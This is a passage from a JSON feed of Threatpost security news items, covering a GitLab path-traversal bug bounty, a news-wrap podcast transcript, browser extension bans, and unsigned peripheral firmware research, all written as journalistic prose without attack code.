["CVE-2020-5135"], "modified": "2020-10-05T19:47:05", "id": "THREATPOST:D4F89B42660582EFECA648A891470AD4", "href": "https://threatpost.com/blackt-cryptojacker-teamtnt/159853/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2020-10-14T22:25:55", "description": "A critical GitLab vulnerability, which could be leveraged by a remote attacker to execute code, recently netted a researcher a $20,000 bug-bounty award.\n\nThe flaw was reported to GitLab by software developer [William Bowling](<https://twitter.com/wcbowling>) via the [HackerOne bug bounty platform](<https://hackerone.com/reports/827052>) on March 23. It was then disclosed this week after being patched in GitLab version 12.9.1.\n\nAt issue is a path-traversal flaw in GitLab, which started out as a web-based Git repository manager but has moved into the DevOps lifecycle-management space. A path traversal is a web security flaw that allows an attacker to read arbitrary files on the server that is running an application. For this particular flaw, the ability to read arbitrary files on the server would give attackers access to tokens, private data, configs and more.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nSpecifically the flaw exists in the UploadsRewriter function of GitLab, which is used to duplicate files. The UploadsRewriter does not validate the file name and path, allowing arbitrary files to be copied without restriction when moving issues to a new project.\n\n\u201cAs there is no restriction on what file can be, path traversal can be used to copy any file,\u201d said Bowling in his bug-bounty report. \u201cThe file or path should be validated before copying files.\u201d\n\nBowling then took the flaw a step further, showcasing how it could be leveraged to launch a remote code-execution attack. Once the arbitrary file read flaw is exploited, he said, it can be used to grab the secret_key_base from the /opt/gitlab/embedded/service/gitlab-rails/config/secrets.yml service.\n\nThe secret_key_base is used to derive keys that are used to generate and verify encrypted or signed cookies. Once attackers access the secret_key_base, they could manipulate these cookie services to send cookies to the server to execute code.\n\nGitLab verified the finding and escalated the issue to its engineering team, granting Bowling an initial $1,000 triage payment for his findings before ultimately granting the $20,000.\n\nGitLab in December [announced it had awarded a total of $565,650](<https://threatpost.com/gitlab-doles-out-half-a-million-bucks-to-white-hats/151138/>) in security bug bounties to 171 researchers who reported valid vulnerabilities in the past year. GitLab launched its [bug-bounty program](<https://hackerone.com/gitlab>) in 2018, and according to Juan Broullon, senior application security engineer at the company, it received a total of 1,378 reports from 513 white-hat hackers in that time.\n\n**_Inbox security is your best defense against today\u2019s fastest growing security threat \u2013 phishing and Business Email Compromise attacks. [On May 13 at 2 p.m. ET](<https://register.gotowebinar.com/register/5064791868226032141?source=ART>), join Valimail security experts and Threatpost for a FREE webinar, [5 Proven Strategies to Prevent Email Compromise](<https://register.gotowebinar.com/register/5064791868226032141?source=ART>). Get exclusive insights and advanced takeaways on how to lockdown your inbox to fend off the latest phishing and BEC assaults. Please [register here ](<https://register.gotowebinar.com/register/5064791868226032141?source=ART>)for this sponsored webinar._**\n\n_**Also, don\u2019t miss our latest on-demand webinar from DivvyCloud and Threatpost, **_[_**A Practical Guide to Securing the Cloud in the Face of Crisis**_](<https://attendee.gotowebinar.com/register/4136632530104301068?source=art>)_**, with critical, advanced takeaways on how to avoid cloud disruption and chaos.**_\n", "cvss3": {}, "published": "2020-04-29T16:39:56", "type": "threatpost", "title": "Critical GitLab Flaw Earns Bounty Hunter $20K", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-5135"], "modified": "2020-04-29T16:39:56", "id": "THREATPOST:C249ACD6B53EBF0A2F149F42F6D9873D", "href": "https://threatpost.com/critical-gitlab-flaw-bounty-20k/155295/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2020-10-14T22:26:07", "description": "For the week ended April 24, Threatpost editors discuss the hottest cybersecurity news stories, including:\n\n * Apple [zero days disclosed](<https://threatpost.com/apple-patches-two-ios-zero-days-abused-for-years/155042/>) in the iPhone iOS that researchers say have been exploited for years. Meanwhile, [Apple has pushed back](<https://threatpost.com/apple-pushes-back-against-zero-day-exploit-claims/155108/>) and said there\u2019s no evidence to support such activity.\n * Nintendo [confirming that](<https://threatpost.com/nintendo-confirms-breach-of-160000-accounts/155110/>) over 160,000 accounts have been hacked, due to attackers abusing a legacy login system (NNID).\n * With the [NFL\u2019s virtual draft](<https://threatpost.com/nfl-tackles-cybersecurity-2020-draft-day/155004/>) kicking off this week, security researchers and teams have been sounding off on security issues leading to data theft or denial of service attacks.\n\n[Download direct here](<http://traffic.libsyn.com/digitalunderground/news_wrap_apr_24_3.mp3>), or listen to the podcast below.\n\n[\n\n](<http://iframe%20style=border:%20none%20src=//html5-player.libsyn.com/embed/episode/id/14130716/height/360/theme/legacy/thumbnail/yes/direction/backward/%20height=360%20width=100%%20scrolling=no%20%20allowfullscreen%20webkitallowfullscreen%20mozallowfullscreen%20oallowfullscreen%20msallowfullscreen/iframe>)\n\n_Below find a lightly edited transcript of the Threatpost news wrap._\n\n**Lindsey O\u2019Donnell-Welch**: Hello everyone, welcome back to the [Threatpost news wrap](<https://threatpost.com/category/podcasts/>). You\u2019ve got the Threatpost team here today to discuss this week\u2019s top cyber security news, including myself, Lindsey O\u2019Donnell-Welch and Threatpost editors Tom Spring and Tara Seals. Tom and Tara, happy Friday.\n\n**Tom Spring**: Hey!\n\n**Tara Seals: **Hey, Lindsey. How are you?\n\n**Lindsey: **Good. There\u2019s been a lot of news from this week that we need to unpack. We\u2019ve had leaked source code, Apple zero days, security issues around the NFL draft. So, Tom, I mean, starting with the Apple zero days, that was kind of a huge news item of the week, and there was some back and forth, and I think the most recent thing, was Apple having a statement come out today about the zero days. Can you kind of give us a sense of what that was all about?\n\n**Tom:** Well, sure, sure. It\u2019s an evolving story. And it started a couple days ago when a number of researchers and I\u2019m probably gonna mispronounce the name of the security firm, ZecOps or something along those lines -I can never pronounce these names \u2013 But anyways, they found two zero days, or what they claimed are two zero days that are very, very troubling when described. An attacker can send an email to an iOS device. And if Apple\u2019s default mail program receives that message, there are two vulnerabilities \u2013 an out of bounds write vulnerability and a heap overflow bug \u2013 that kick in when this specially crafted message arrives. In very simple terms, the bugs impact the way that the mail program processes memory. And I won\u2019t get into the technical aspects of it, we\u2019ve written about it, it\u2019s on Threatpost. But essentially, the hackers can use this to either extract data from the mailbox itself, and or combine the flaw to actually take over the device or take control of the device. This was something that was very shocking considering that any modern patched version of the iOS was vulnerable to this attack. The researchers said that this is an attack that\u2019s been used in the wild in a number of targeted attacks by some APTs. And so that story goes. Apple did release a beta update to iOS. And it was reported a couple days ago. And it seemed to suggest Apple was kind of quiet at the time. But given that Apple had released a beta version of its iOS, it seemed that Apple was was not explicitly stating that there was a problem, but suggested it by sending out a patch. Now today, Apple is downplaying the impact of the bug and saying that it has found no evidence that that the bug, number one, has been used in the wild. And just to briefly, quote, Apple\u2019s statement released I believe was yesterday: \u201cWe have concluded these issues do not pose an immediate risk to our users. The researchers identified three issues in mail, but alone, they are insufficient to bypass iPhone or iPad protections. And we have found no evidence they were used against customers.\u201d So we have the classic he said, she said, and we\u2019ll see how this plays out. But it\u2019s high drama, once again with zero days, zero day claims and zero day denials.\n\n**Lindsey:** Yeah, it definitely seems like it is turning into kind of a he said-she said type of report. And it\u2019s interesting too, you know, just looking at ZecOp\u2019s report, they did kind of go into deep detail about the flaws being exploited in the wild. And I think they had mentioned that there were a number of different targets, including individuals from a Fortune 500 org in North America, and executives from a Japanese based carrier. So it is just kind of interesting that Apple is pushing about back against those specific claims that the bugs have been exploited for years. And I\u2019m curious to see kind of where this goes and whether the researchers respond back to Apple at all, and, you know, further kind of corroborate what they had written in the report.\n\n**Tom:** Yeah, well, you know, Apple has gotten some support from the research community. I believe that Google\u2019s Project Zero researchers have chimed in expressing some doubt on the ZecOps research. Meanwhile if anybody\u2019s worried there is the beta version of the iOS that you can download right now and I\u2019m sure we\u2019re going to be hearing more from Apple about them pushing out an update, a final update, for the iOS as well. But you know, I mean, I mean here again, you have Apple which is tight lipped won\u2019t comment and I mean, they have to put out a statement days after the the researchers come out with their their findings. From a reporter standpoint, it would be so nice [if Apple would open up a bigger dialogue](<https://threatpost.com/apple-upgrades-bug-bounty-program-adds-macs-1m-reward/147146/>), not only with journalists, but especially with researchers in terms of maybe helping them better understand what they found, the original research really, casted no doubt on their own research. I mean, why would they, but at least, you know, they could have tempered some of their research with some feedback from Apple. I\u2019m not too sure if they purposely left it out. But you know, historically speaking, it\u2019s tough for researchers to get to vendors to give a [full throated response to their research](<https://threatpost.com/google-bug-hunter-urges-apple-to-change-its-ios-security-culture/134842/>), but we shall be following this story. I\u2019m sure we might even see some interesting things happen over the weekend and Monday morning. We\u2019ll be watching carefully.\n\n**Tara**: I have a question Tom. Have there been any third party researchers that have taken a look at this and weighed in at all with an opinion?\n\n**Tom:** Well, Google Project Zero did. And they cast some doubt on the research itself. I\u2019m not aware of anybody else, I\u2019ve heard a lot of researchers comment on the zero days, but they were commenting in reaction to the actual research being released, they weren\u2019t commenting on, their own reverse engineering, the proof of concepts and dissecting the research itself. So, you know, there could be a lot more noise going out there. And again, this is a fast moving story, and it\u2019s evolving quickly. And we will be keeping a close eye on the Twittersphere of reliable researchers and reaching out to a lot of people on the phone and hopefully, we\u2019ll have a good solid update either over the weekend or ASAP to better assess the real threat here with these \u201czero days.\u201d\n\n**Lindsey: **Right. Well, that was definitely one of the bigger stories of this week. And actually another big story, I guess two similar stories kind of revolved around the gaming community. And one of those stories was Nintendo today, coming out and confirming that 160,000 accounts have been hacked.\n\n**Tom:** Yeah Lindsey, which Nintendo\u2019s accounts? Do we know? I mean, I\u2019m just thinking about my my son\u2019s different accounts with Nintendo. Do we know what platform or services may have been impacted?\n\n**Lindsey:** Yeah, so, basically over the past few weeks, gamers who are using the Nintendo Switch were reporting suspicious activities on their accounts. And they were basically going on Twitter and there were different posts on Reddit saying that unauthorized actors had been logging into their accounts using their PayPal or their payment card methods that were connected to the accounts and buying digital currency for like, online in-game systems. So like [Fortnite V-Bucks](<https://threatpost.com/fortnite-ransomware-masquerades-as-an-aimbot-game-hack/147549/>), etc, etc. This was reported over the past few weeks by various outlets, but Nintendo had stayed kind of silent about whether this was actually happening or what was behind this. And finally, in a statement today, it said that it first of all confirmed the attacks, it said that specifically 160,000 accounts were hacked, and it said the reason that this hack was occurring was because attackers were abusing the Nintendo Network ID legacy login system, which I don\u2019t know if you guys remember but that was from the Nintendo 3DS and Wii U console. That was what was primarily used to login and to buy digital currency for those accounts. So anyways, Nintendo was saying that this login ID was being linked to various Nintendo accounts for the switch. And somehow attackers were able to access the accounts tied to this legacy login system and were then able to access the linked Nintendo accounts for the Switch. And from there, they\u2019d have access to the different payment methods, and were able to make the in-game purchases. So Nintendo didn\u2019t provide any further details about how these accounts were specifically being accessed. But they did say that they were being obtained by some means other than their own service. So I know there had been theories about like credential stuffing or otherwise but that doesn\u2019t seem like it was the case here. So it\u2019s now disabled the NNID login service so that you can\u2019t use that anymore.\n\n**Tom:** Well, I\u2019ll hear from my son with if he\u2019s had trouble connecting, and I\u2019ll know what\u2019s going on.\n\n**Lindsey:** Yeah, yeah, I would check in and make sure.\n\n**Tom:** I wrote a [story about at Linksys, they had to reset their passwords](<https://threatpost.com/attacks-on-linksys-routers-trigger-mass-password-reset/154914/>). And I\u2019m a Linksys customer. And they assured me that every single Linksys customer had been notified. And then I was like, \u201cWell, hold on a minute. I\u2019m a Linksys customer, I haven\u2019t been notified.\u201d And they backtracked and said, \u201cwell, we\u2019re doing it in waves.\u201d So I take it with a grain of salt, when a lot of these companies say they\u2019ve implemented a fix \u2013 whether or not that fix is immediate or whether phases in over time. So I\u2019ll be interested to hear whether my son\u2019s actually having issues or not, or whether they\u2019ve reset passwords or whatnot.\n\n**Lindsey:** Yeah, well, it seems like a lot of companies can post the statement onto their Twitter accounts or on their website and think that\u2019s enough. But you\u2019d be surprised that the number of people who actually need the email notification to be notified of these hacks. So, but it did advise players to set up two factor authentication, of course, to add that extra layer of security to accounts. And it is also resetting the passwords for affected accounts. So hopefully, this problem will go away. I know it had been a widespread kind of issue for people who had been reporting about it online. So we\u2019ll see.\n\nThat was one of the news related to kind of gaming. The other one was the [discovery of leaked source code this week](<https://threatpost.com/valve-confirms-csgo-team-fortress-2-source-code-leak/155092/>) for two popular games that were published by Valve. Those were Counter Strike: Global Offensive and Team Fortress 2. And basically, that was a whole issue because the source code, if accessed, could lead to security issues or cheating, which probably isn\u2019t as serious, but you know, it\u2019s still a problem. And Valve, the developer and publisher of the two games, came out and basically said that the source code in question dates back to 2017, and was already part of an existing leak from 2018. But anyways, I think that goes to show that these security issues do continue to pop up in the gaming space. And there\u2019s such like a massive install base for gamers that this is just a [really lucrative area for cybercriminals](<https://threatpost.com/researcher-discloses-second-steam-zero-day-after-valve-bug-bounty-ban/147593/>) to be looking at.\n\n**Tara:** Yeah, I definitely think that\u2019s the point I was going to make is that, I think, Nintendo has 20 million active users or something like that. And these massive multiplayer games have millions of users to in some cases, and so, you know, I\u2019m surprised we don\u2019t care more about gamer hacking stuff to be honest.\n\n**Lindsey:** Yeah, definitely. I definitely agree, Tara. And so, and then Tara, you also had a very timely news story about the NFL Draft, which is virtual this year and kind of the security concerns that researchers and also teams were having with the event as it starts this week. What was kind of the top concerns there?\n\n**Tara: **Yeah, so the NFL Draft, obviously is a massive, massive event for the league every single year. This is for the sliver of the population that doesn\u2019t know about it, it\u2019s basically where you have pro teams that are looking at the people that are coming out of college and, you know, the Canadian league and some other places that you know, have not been signed to the pros yet, and they evaluate their stats and everything and then this is their opportunity to find new people to the roster. And so in the past this has been done in sort of public space and everybody kind of gets together and teams will congregate at their stadiums and war rooms and things like that. That\u2019s not possible. And so everybody is basically trying to do this with one to one links, you know, from their houses. So you have a head coach in his house or her house, and then you have, you know, the GM in their house and then obviously, all the players trying to tune in, the prospective players that is and so if you look at it, the communications footprint here, the distributed communications footprint is pretty massive. And so in order to bring everybody together to make this happen, there\u2019s a couple of different platforms to do that, one was Microsoft Teams, and then there\u2019s Zoom, you know, infamous Zoom, which clubs are using to communicate amongst themselves.\n\n**Lindsey:** The security issues here are really something that\u2019s good to be looking at right now, with something as big as this, and it\u2019s something that we\u2019ll also have to probably continue looking at for for the foreseeable future. But I also think kind of the technical logistics in the background are important too. And I saw on Twitter yesterday, there was like this [picture of Belichick looking at the draft from his house](<https://twitter.com/jeffphowe/status/1253504449244512257?ref_src=twsrc%5Etfw%7Ctwcamp%5Etweetembed%7Ctwterm%5E1253504449244512257&ref_url=https%3A%2F%2Fkasperskycontenthub.com%2Fthreatpost-global%2Fwp-admin%2Fpost.php%3Fpost%3D155122%26action%3Dedit>) in Nantucket and a bunch of people were, laughing about the fact that, questioning how he was able to get Wi-Fi on on Nantucket, and whether it was able to hold up and all these things. So I think, it\u2019s just so new that there\u2019s a lot of like questions and technical concerns there too.\n\n**Tara:** Yeah, it\u2019s kind of interesting because there are 100+ video feeds when you take into account you know, all the general managers, all the prospects which there are 58 different prospects and the coaches themselves and then plus that\u2019s not even including, you know, the individual underlings that are involved in the process. But yeah, the Belichick thing was really funny. And then also the [head coach of the Arizona Cardinals was all over Twitter](<https://twitter.com/nfldraftscout/status/1253478908487503873?ref_src=twsrc%5Etfw%7Ctwcamp%5Etweetembed%7Ctwterm%5E1253478908487503873&ref_url=https%3A%2F%2Fnesn.com%2F2020%2F04%2Fnfl-twitter-went-bananas-after-seeing-cardinals-kliff-kingburys-pad%2F>), it went totally viral yesterday, he has this sort of Bond villain layer in the Phoenix mountains vibe. It was all like gleaming white and like he\u2019s wearing, you know, Italian loafers. And he just looks at like an Armani ad or something. I mean, there\u2019s a lot of cultural fun stuff that goes along with this. But there\u2019s also a lot of, you know, legitimate cyber security concerns. And so, with the draft picks, you know, you wouldn\u2019t think of that as being sort of critical information, but it really is. And you consider that if a team\u2019s job strategy is leaked to another team, then that\u2019s obviously competitive and that can destroy a team season in theory. You also have, if these things are able to be intercepted, then it can be very useful for people in the online gambling world, for example, there\u2019s a lot of fraud that can be carried out with that. And so there are a few different things that can be done if job information falls into the wrong hands. And so that\u2019s really what they were concerned about. I did reach out to the NFL to find out what their take was on cyber security, and they wouldn\u2019t reveal what exactly they\u2019ve done. But they did say that they they are aware of the potential dangers, and I mean, the draft is going to continue through tomorrow. So, you know, remains to be seen if they successfully warded off any attacks or not.\n\n**Lindsey:** Right, I was about to ask if there have been any incidents so far, but I\u2019m sure that remains to be seen at this point. But yeah, I think that you know, obviously the the data itself in terms of team strategy and personnel plans is a big issue. And also I feel like denial of service could be an issue here too. And you know, launching a denial of service attack or even kicking people off.\n\n**Tara:** Yeah, I\u2019m so glad that you said that actually. Because that is that is one thing that one of the security researchers that I talked to had mentioned was that the denial of service aspect of this, obviously. So anybody who plays Fantasy Football is familiar with this, but you get a very short window of time to make your job spec and it\u2019s kind of a snooze, you lose if you don\u2019t do it in that time period, then you get passed over and you don\u2019t get to go back and redo it. So, you know, conceivably, an attacker could DDoS someone you know, a club and prevent them from making their draft pick and there would be no way for them to go back and remediate that really. So again, these are things that can make a pretty radical difference when it comes to the team\u2019s future. And of course, this is assuming that we\u2019re going to have an NFL season this year.\n\n**Lindsey:** We\u2019ll see. Fingers crossed. I really like that story. It\u2019s a fun and applicable story. And you know, I put it on Facebook and someone posted, \u201cyou know [the NFL has] been hacked when the first person picked is Terry Bradshaw.\u201d All right. Well, on that note, it\u2019s been a very busy week in the infosec world, and there\u2019s much more that needs to be covered. So let\u2019s wrap up the podcast here, Tom and Tara, thanks for coming on today.\n\n**Tom:** Yeah, thank you.\n\n**Tara:** Thanks, Lindsey. You guys have a good weekend.\n\n**Lindsey:** You too. And to all our listeners. Thank you for joining us today. If you like what you\u2019ve heard here, be sure to share this episode on social media. And if you have any comments or thoughts regarding Apple zero days, or any of the new stories that we\u2019ve talked about today, please [reach out to us on Twitter at @Threatpost](<https://twitter.com/threatpost>) and let\u2019s keep the conversation going. If not catch us next week on the Threatpost podcast.\n\n_**Also, check out our [podcast microsite](<https://threatpost.com/microsite/threatpost-podcasts-going-beyond-the-headlines/>), where we go beyond the headlines on the latest news.**_\n", "cvss3": {}, "published": "2020-04-24T17:11:16", "type": "threatpost", "title": "News Wrap: Nintendo Account Hacks, Apple Zero Days, NFL Security", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-5135"], "modified": "2020-04-24T17:11:16", "id": "THREATPOST:CAAA6F4ECA9D8F91250F10C27A869E23", "href": "https://threatpost.com/news-wrap-nintendo-account-hacks-apple-zero-days-nfl-security/155122/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2020-10-15T22:25:35", "description": "UPDATE\n\nBoth the Google Chrome and Mozilla Firefox teams are cracking down on web browser extensions that steal user data and execute remote code, among other bad actions.\n\nBrowser extensions are add-ons that users can install to enhance their web surfing experience \u2013 they offer the ability to do everything from setting a special search wallpaper to displaying continuous weather data to language translation. This group also includes things such as ad blockers and security scanning.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nWhile extensions are useful, they can also introduce danger. In addition to [intentionally malicious](<https://threatpost.com/malicious-browser-add-guides-victims-phishing-sites-112912/77262/>) browser extensions that compromise users, legitimate offerings are also common targets for cybercriminals who [look to exploit vulnerabilities](<https://threatpost.com/cisco-webex-browser-bug/143285/>) in their code.\n\n## Google Bans Paid Extensions\n\nIn this case, Google said that after becoming aware of a widespread pattern of pernicious behavior on the part of a large number of Chrome extensions, it has disabled extensions that contain a monetary component \u2013 those that are paid for, offer in-browser transactions and those that offer subscription services. It\u2019s a temporary measure, according to the internet giant \u2013 but one that doesn\u2019t yet have a timeline for resolution.\n\n\u201cEarlier this month the Chrome Web Store team detected a significant increase in the number of fraudulent transactions involving paid Chrome extensions that aim to exploit users,\u201d it [said in a notice](<https://groups.google.com/a/chromium.org/forum/#!topic/chromium-extensions/EW0VuDjZSO4>), issued Friday. \u201cDue to the scale of this abuse, we have temporarily disabled publishing paid items. This is a temporary measure meant to stem this influx as we look for long-term solutions to address the broader pattern of abuse.\u201d\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2020/01/27133106/google-paid-extensions.png>)\n\nClick to Enlarge: Top 5 Paid Chrome Extensions\n\nThe notice added, \u201cWe are working to resolve this as quickly as possible, but we do not have a resolution timeline at the moment. Apologies for the inconvenience.\u201d\n\nRejections will carry a \u201cSpam and Placement in the Store\u201d tag, the Google team told developers. Rejections can be appealed and will be reviewed, it noted.\n\nThe impact could be minimal. According to [data from Extension Monitor](<https://extensionmonitor.com/blog/breaking-down-the-chrome-web-store-part-1>) published mid-2019, there are about 188,000 extensions in the Chrome Web Store, out of which only about 9 percent (16,718) fall into the paid category. Paid add-ons also account for less than 2.6 percent of the more than 1 billion total extension installs logged in the research. The top five paid extensions make up about half (48.5 percent) of that number, with IE Tab dominating at 4.1 million installs (31.5 percent). About 35 percent of paid extensions (5,885) don\u2019t have any users at all.\n\n_**Updated 9:30 a.m. ET on Jan. 28: Threatpost has reached out to Google for clarification on whether existing paid extensions have been taken down, or if the policy applies only to updates and new submissions.**_\n\n## Mozilla Cleans House\n\nMozilla meanwhile has taken a more case-by-case tack, disabling 197 Firefox add-ons in total for a range of improper activity, as first [reported by ZDnet](<https://www.zdnet.com/article/mozilla-has-banned-nearly-200-malicious-firefox-add-ons-over-the-last-two-weeks/>). This includes remote code-execution and harvesting user data. The add-ons have not only been removed from the official Mozilla Add-on (AMO) portal, but have been disabled in the browsers of existing installs.\n\nThe disabled apps include a whopping 129 extensions from 2Ring, which offers extensions and add-ons that provide business-to-business functionality for unified communications and contact centers. It\u2019s a Cisco Preferred Partner, and it [says on its website](<https://www.2ring.com/products/>) that it has \u201ca roadmap aligned with Cisco\u2019s collaboration portfolio and with solutions that their system engineers can deploy repeatedly and support with ease.\u201d\n\nThreatpost reached out to 2Ring for comment. Meanwhile, \u201cI\u2019ve reviewed the add-ons and confirmed they are executing remote code,\u201d according to the bug tracker on the issue.\n\nThat\u2019s not to say the extensions were intentionally malicious. Mozilla\u2019s policy is that extensions that dynamically fetch code from elsewhere, legitimate or otherwise, are in violation of its [content security policy](<https://developer.mozilla.org/en-US/docs/Mozilla/Add-ons/WebExtensions/Content_Security_Policy>).\n\nThe blocked extensions uncovered by ZDnet also include [six add-ons](<https://bugzilla.mozilla.org/show_bug.cgi?id=1609718>) deemed to be executing remote code, which were developed by Tamo Junto Caixa. [Tamo Junto](<https://aliancaempreendedora.org.br/tamojunto/faq/>) is a banking entity that offers Brazilian microentrepreneurs online courses, video classes, articles and management tools.\n\nOther browser extensions, like Rolimons Plus (an extension linked to the Roblox online multiplayer video game), [was blocked](<https://bugzilla.mozilla.org/show_bug.cgi?id=1608432>) for \u201ccollecting ancillary user data against our policies,\u201d while others (unnamed in the bug ticket) [were banned](<https://bugzilla.mozilla.org/show_bug.cgi?id=1610462>) for \u201cshowing malicious behavior on third-party websites.\u201d Still others, including [three unnamed add-ons](<https://bugzilla.mozilla.org/show_bug.cgi?id=1610456>), were determined to be \u201cfake premium products.\u201d\n\nAs with Google Chrome, Mozilla developers are able to appeal the bans.\n\nAt least one researcher said that the actions are likely the fruit of heightened concerns and regulations around privacy, including the California Consumer Privacy Act (CCPA).\n\n\u201cIn the [post-CCPA/GDPR world](<https://threatpost.com/californias-tough-new-privacy-law-and-its-biggest-challenges/151682/>), tech companies are paying greater attention to the risks that software poses to users,\u201d said Mike Bittner, associate director of Digital Security and Operations for The Media Trust, via email. \u201cMuch of the risks stem from having no control over what impact code will have on the security and privacy of user personal data. Until tech companies know who\u2019s running what code in the various components that make up extensions and other forms of software, the risk of fraud and theft will remain high, as will the risk of running afoul of these new privacy laws.\u201d\n", "cvss3": {}, "published": "2020-01-27T21:26:55", "type": "threatpost", "title": "Google, Mozilla Ban Hundreds of Browser Extensions in Chrome, Firefox", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-5135"], "modified": "2020-01-27T21:26:55", "id": "THREATPOST:6F4D076CD2B99D42353A5547FDBB288C", "href": "https://threatpost.com/google-mozilla-ban-browser-extensions-chrome-firefox/152257/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2020-10-14T22:30:12", "description": "Fresh firmware vulnerabilities in Wi-Fi adapters, USB hubs, trackpads and cameras are putting millions of peripheral devices in danger of a range of cyberattacks, according to research from Eclypsium.\n\nTouchPad and TrackPoint firmware in Lenovo Laptops, HP Wide Vision FHD camera firmware in HP laptops and the Wi-Fi adapter on Dell XPS laptops were all found to lack secure firmware update mechanisms with proper code-signing.\n\n\u201cSoftware and network vulnerabilities are often the more-obvious focus of organizations\u2019 security priorities, but firmware vulnerabilities could give adversaries full control over the compromised device,\u201d Katie Teitler, senior analyst at TAG Cyber, said via email. \u201cThis could lead to implanted backdoors, network traffic sniffing, data exfiltration and more. Unfortunately, though, firmware vulnerabilities can be harder to detect and more difficult to patch.\u201d\n\n## Unsigned Firmware Updates: A Growing Problem\n\nFirmware for peripherals can be burned into the integrated circuit of the device itself, or the component may have its own flash memory where firmware is stored. Firmware can also be dynamically provided by the operating system at boot time. Regardless of the implementation approach, firmware is used as the device-specific operating system for the peripheral in question, and can provide criminals with a rich attack surface if found to be vulnerable.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\n\u201cMany peripheral devices do not verify that firmware is properly signed with a high-quality public/private key before running the code,\u201d explained researchers at Eclypsium, in vulnerability research [released on Tuesday](<https://eclypsium.com/2020/2/18/unsigned-peripheral-firmware/>). \u201cThis means that these components have no way to validate that the firmware loaded by the device is authentic and should be trusted. An attacker could simply insert a malicious or vulnerable firmware image, which the component would blindly trust and run.\u201d\n\nThe scenario for an attack is thus a simple one. First, an attacker gains access to a device via any method, be it physical access, malware that allows remote code execution and so on, and, with basic user privileges, the attacker can write malicious firmware to a vulnerable component. If the component doesn\u2019t require the firmware to be properly signed, the attacker\u2019s code is loaded. Depending on the peripheral in question, this can lead to a range of malicious activity.\n\n\u201cFor example, malicious firmware on a network adapter could allow an attacker to sniff, copy, redirect or alter traffic leading to a loss of data, man-in-the-middle and other attacks,\u201d according to the research. \u201cPCI-based devices could enable [Direct Memory Access (DMA) attacks](<https://threatpost.com/dell-hp-memory-access-bugskernel-privileges/152369/>) that could easily steal data or take full control over the victim system. Cameras could be used to capture data from the user\u2019s environment, while a compromised hard drive could allow the attacker to hide code and tools without being seen by the operating system.\u201d\n\nFurther, firmware attacks allow malicious activity to fly under the radar of endpoint protections; as recently seen in the [latest campaigns using the RobbinHood ransomware](<https://threatpost.com/byo-bug-windows-kernel-outdated-driver/152762/>), vulnerable drivers can be used to bypass security protections and enable ransomware to attack without interference.\n\nJesse Michael, principal researcher at Eclypsium, told Threatpost that the kinds of attacks that these bugs enable are not insignificant. For instance, the Black Energy attack that brought down part of the power grid in Ukraine used an unsigned firmware update to break serial-to-Ethernet adapters that were used to control relays.\n\n\u201cA similar incident occurred with Saudi Aramco,\u201d he said. \u201cThis made the system much harder to bring back online.\u201d He added that firmware-based attacks have seen a 7.5-time increase in firmware/hardware CVEs from three years ago.\n\n## New Vulnerabilities\n\nEclypsium researchers analyzed a Lenovo ThinkPad X1 Carbon 6th Gen laptop, which contains two vulnerable firmware mechanisms: Touchpad firmware (pr2812761-tm3288-011-0808.img) and TrackPoint firmware (PSG5E5_RANKA_fv06.bin).\n\n\u201cWe discovered that the Touchpad and TrackPoint use insecure firmware update mechanisms,\u201d according to the research. \u201cSpecifically, cryptographic signature verification was not required at the device level before firmware updates were applied. This lack of control made it possible to modify the firmware images through software to run arbitrary malicious code within these components.\u201d\n\nMeanwhile, the firmware updates distributed by HP for the HP Wide Vision FHD camera found in the HP Spectre x360 Convertible 13-ap0xxx laptop are unencrypted and lack authenticity checks, Eclypsium noted. The device\u2019s firmware updater is composed of SunplusIT\u2019s Windows-based firmware update tool along with the firmware image, and both have issues.\n\n\u201cThe firmware image does not include any form of cryptographic signature or other authenticity information,\u201d according to the report. \u201cThe Windows-based firmware update tool accepts firmware files that have been modified to adjust USB descriptor contents. This ability to modify USB descriptors can be leveraged to disable the device or cause it to be identified as a different type of USB device. Once additional details of the processor architecture are discovered, the camera module behavior can be altered to be malicious.\u201d\n\nAlso, the SunplusIT firmware updater can successfully update a device even as a normal user, rather than requiring administrator access \u2013 a violation of best practices.\n\nEclypsium researchers also found that the firmware of the Wi-Fi adapter on Dell XPS 15 9560 laptops running Windows 10 has a bug. While Windows 10 will confirm that the drivers are correctly signed, that\u2019s where the security checks stop. So, if the drivers are correctly signed, a small certificate icon is displayed next to the driver when viewed in the device manager. If they aren\u2019t correctly signed, a user can still successfully load them \u2013 the icon merely goes away. This means that a privileged attacker could easily replace driver files.\n\nAnd finally, the researchers also took a look at the Linux Vendor Firmware Service, which is a secure portal that allows hardware vendors to upload firmware updates. An analysis showed multiple insecure updates and drivers.\n\n\u201cFrom this resource we can focus specifically on update protocols and easily review which are signed and which are not,\u201d the researchers wrote. \u201cWhile we can see that some of the update protocols are related to transport, many others are protocols used for the actual update process. For example, VLI USB Hub firmware is unsigned.\u201d\n\n## Vendor Response\n\nEclypsium researchers notified HP of the webcam firmware vulnerability on August 4, and Lenovo of the TouchPad/TrackPoint vulnerability on Lenovo on June 13.\n\n\u201cWe expect some vendors will issue CVEs, but none have as of yet,\u201d Jesse Michael, principal researcher at Eclypsium, told Threatpost. \u201cFor these peripherals, the OEMs (HP and Lenovo) have to work with their suppliers to develop fixes. From what we\u2019ve seen, most of these existing components were initially designed to have unsigned firmware, making them inherently vulnerable. Our interactions with these OEMs lead us to expect that future systems will have firmware update authentication requirements built in.\u201d\n\nEclypsium also reported the Wi-Fi issue to both Qualcomm, who provides the chipset and driver for the wireless card, and to Microsoft, which checks that such drivers are signed.\n\n\u201cQualcomm responded that their chipset is subordinate to the processor, and that the software running on the CPU is expected to take responsibility for validating firmware,\u201d Michael said. \u201cThey stated that there was no plan to add signature verification for these chips. However, Microsoft responded that it was up to the device vendor to verify firmware that is loaded into the device.\u201d The result is that this will likely go unaddressed, since each is pointing the responsibility back to the other.\n\nBottom line: Unsigned firmware in 